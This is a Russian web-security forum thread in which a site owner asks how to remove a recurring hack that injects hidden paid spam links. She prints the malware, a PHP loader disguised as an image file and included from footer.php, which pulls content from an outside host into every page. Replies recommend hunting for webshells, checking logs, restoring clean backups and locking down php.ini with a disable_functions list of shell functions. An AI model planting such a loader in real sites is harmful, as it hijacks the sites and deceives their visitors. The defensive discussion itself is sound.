Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Страницы: 1
RSS
Взломали сайт для продажи с него ссылок через Sape. Как устранить хакера?
 
Наш сайт был взломан и помещен в Sape для продажи с него ссылок.
На сайте все время появляется невидимая чужая ссылка вида:

<div st yle=display:none> чужой сайт</div>

Вот такие следы взлома были обнаружены на сайте:
-------------
Был вписан код в файл footer.php

<?php include('images/processor.jpg');?>


Файл processor.jpg содержал следующий код:
---------------
<?php
/*
* Это код для вставки в сайты - жертвы. В нем ОБЯЗАТЕЛЬНО надо указать путь до файла "жертва.php"
*/
$host = $_SERVER["HTTP_HOST"];
$url = $_SERVER["REQUEST_URI"];
ob_start();
function COMMON_GetPageContentViaGET($sUrl){
 $aContent = file($sUrl);
 return( implode( '', $aContent ) );
}
$content = COMMON_GetPageContentViaGET('http://crookwach.com/plugins/editors/tinymce/jscripts/tiny_mce/plugins/spellc­hecker/img/icons/my_site.ru.php?host='.$host.'&uri='.urlencode($url));
ob_end_clean();
echo $content;
?>
-----------------
Удалили  этот  код  из  файла  footer.php,  удалили  файл
processor.jpg и сменили пароль доступа по FTP. Через день все повторилось. Доступ к сайту после смены паролей есть только у меня. Вирусов на компьютере не обнаружено. Права доступа к папкам и файлам выставлены правильно. Тем не менее кто-то меняет файлы.
Хостер пишет, что "Изменения файлов произошли или через FTP, или через SSH, или через SHELL,
запущенный на вашем сайте".


Как с этим бороться, как устранить взлом?
Изменено: Алиса * - 03.01.2011 17:05:15
 
Скорее всего вас просто еще раз взломали через туже уязвимость что и в первый раз. Вам нужно проверить весь сайт на уязвимости. Или, как минимум, дайте ссылку здесь, можно бегло просмотреть.
 
может на сайте еще бекдор/вебшелл какой нить оставлен.
смотрите по логам, куда было обращение на время модификации сайта
 
Большое спасибо, Ayanami, за ответ! Не хотелось бы засвечивать здесь сайт, имеющий уязвимости. Отправлю ссылку в личку. Заранее огромное спасибо.

Цитата
Ayanami пишет:
Скорее всего вас просто еще раз взломали через туже уязвимость что и в первый раз. Вам нужно проверить весь сайт на уязвимости. Или, как минимум, дайте ссылку здесь, можно бегло просмотреть.
 
Спасибо, phoenix, за ответ! А как не специалисту отличить бекдор/вебшелл от родного кода сайта?  

Цитата
phoenix пишет:
может на сайте еще бекдор/вебшелл какой нить оставлен.

смотрите по логам, куда было обращение на время модификации сайта
 
разобраться в логике работы скриптров.
В целом, любой код, который писали не вы (не ваш программист) должен вызвать максимальные подозрения.
А вообще, к сожалению, могу сказать, что вычистить все бекдоры, оставленные хакером, а также найти и закрыть дыру, через которую сайт был взломан изначально (хотя тут я не могу исключить, что сайт был взломан подсовыванием трояна да десктоп администратора сайта) неспециалисту будет тяжело.
Как вариант - можете восстановить все файлы из априори чистой резервной копии, или сравнивать файлы из априори чистой резервной копии и текущие файлы сервера - так можно обнаружить бекдор.
ну и как я уже сказал, смотрите по логам, куда было обращение на время модификации сайта
 
когда то для себя сохранил следующий текст

Код
Открываем php.ini и редактируем следующим образом:
register_globals=Off – отключаем глобализацию переменных. Значение в On – пожалуй, самая известная ошибка конфигурирования PHP;
safe_mode=On - включаем жесткий режим ограничений (с этой настройкой следует быть аккуратным);
open_basedir= /www – ограничиваем место выполнения PHP кода;
magic_quotes=On - включаем «магические ковычки» для GET/POST/COOKIE - препятствует SQL-inj;
mysql.trace_mode=Off - отключаем показ ошибок Mysql;
allow_url_fopen=Off - отключаем удаленное открытие файлов файловыми функциями (препятствует удаленному PHP-инклуду);
allow_url_include=Off - отключаем удаленное подключение файлов (препятствует удаленному PHP-инклуду);
error_reporting=Off - отключаем показ всех ошибок (действительно, зачем посвящать взламывающего во все тонкости работы сервера:));
disable_functions= exec, system, passthru,shell_exec  – задаем ограничение на использование потенциально опасных функций. 


для вас я думаю будет правильным:
open_basedir= /www – разделить место залития файлов (как я понял у вас есть upload) и сам сайт
allow_url_include=Off (это закроет "<?php include('images/processor.jpg');?>", но главное что бы это у вас нигде больше не использовалось)
allow_url_fopen=Off (ну и это тоже может быть тоже поможет)
З.Ы. хотя я могу и ошибаться
 
Цитата
[mad]Mega пишет:
allow_url_include=Off (это закроет "<?php include('images/processor.jpg');?>"
С чего вдруг? Это закроет инклуд только с других хостов!

Если у Алиса Селезнева, есть доступ к php.ini то лучше задиссаблить ниже перечисленные функции
disable_functions  =exec, system, passthru, shell_exec, sh2_exec,escapeshellarg, escapeshellcmd,  proc_nice,  proc_open, popen,pcntl_exec,  dl,dlopen,ini_restore,  socket_create_listen, socket_create,            stream_socket_client,stream_socket_server,pfsockopen,  disk_total_space,disk_free_space,diskfreespace,getrusage,get_current_user, chdir, chown  ,chgrp, chmod,  getmyuid,getmypid,  posix_getpwuid,posix_getgrgid,posix_kill,posix_kill,  link,symlink,  posix_mkfifo,  putenv, com_load, com_load_typelib, dotnet_load,  virtual, apache_note, apache_lookup_uri
и если нет операций с файлами, то ещё fopen,dir,opendir

disable_functions  = и т.д  в файле php.ini это должна быть одна длинная строка, без переносов на другие строчки

Стоит посмотреть время изменения файлов и посмотреть в логах апача, какие и откуда были запросы к сайту в это время.
Обратите внимание на версию апача и php у хостера и посмотрите сколько в них уже найдено уязвимостей.
 
Уважаемые форумчане, большое вам всем спасибо за участие!!!
 
Вообще, если получают доступ по FTP, очень любят менять системные бинари. Так что, тут задача проверить целостность всей системы, а не только код сайта.

На самом деле - надо убирать сайт в chroot, jail или вешать на внутренние адреса и менять ftp на что-то более секьюрное, типа rsync через ssh с авторизацией по ключам.
 
Всем добрый вечер! У меня следующая проблема: сайт стал совершенно с другим внешним содержанием, хотя файлы лежат нетронутые, логин и пароль от управления хостингом были не только у меня, подозреваю что это диверсия, но так как я далеко не программист, то остается только строить догадки о том, как можно решить данную проблему =) Помогите, уважаемые программисты!)))
 
Цитата
resk
Всем добрый вечер! У меня следующая проблема: сайт стал совершенно с другим внешним содержанием, хотя файлы лежат нетронутые, логин и пароль от управления хостингом были не только у меня, подозреваю что это диверсия, но так как я далеко не программист, то остается только строить догадки о том, как можно решить данную проблему =) Помогите, уважаемые программисты!)))
Меняем пароль на панель управления хостингом и не кому не говорим. Проверяем свой ПК на троян/вирусы/ и прочую нечисть. Если проблемы останутся, значит дыра в сайте.  
 
Цитата
resk
Всем добрый вечер! У меня следующая проблема: сайт стал совершенно с другим внешним содержанием, хотя файлы лежат нетронутые, логин и пароль от управления хостингом были не только у меня, подозреваю что это диверсия, но так как я далеко не программист, то остается только строить догадки о том, как можно решить данную проблему =) Помогите, уважаемые программисты!)))
Может DNS домен заэкспайрился и кто-то просто его захватил и перенаправил на свой веб-сервер?

П.С. В следующий раз создавайте новую тему, а не реанимируйте тему четырехлетней давности.
 
если не секрет, проблема устранена?
Страницы: 1
Читают тему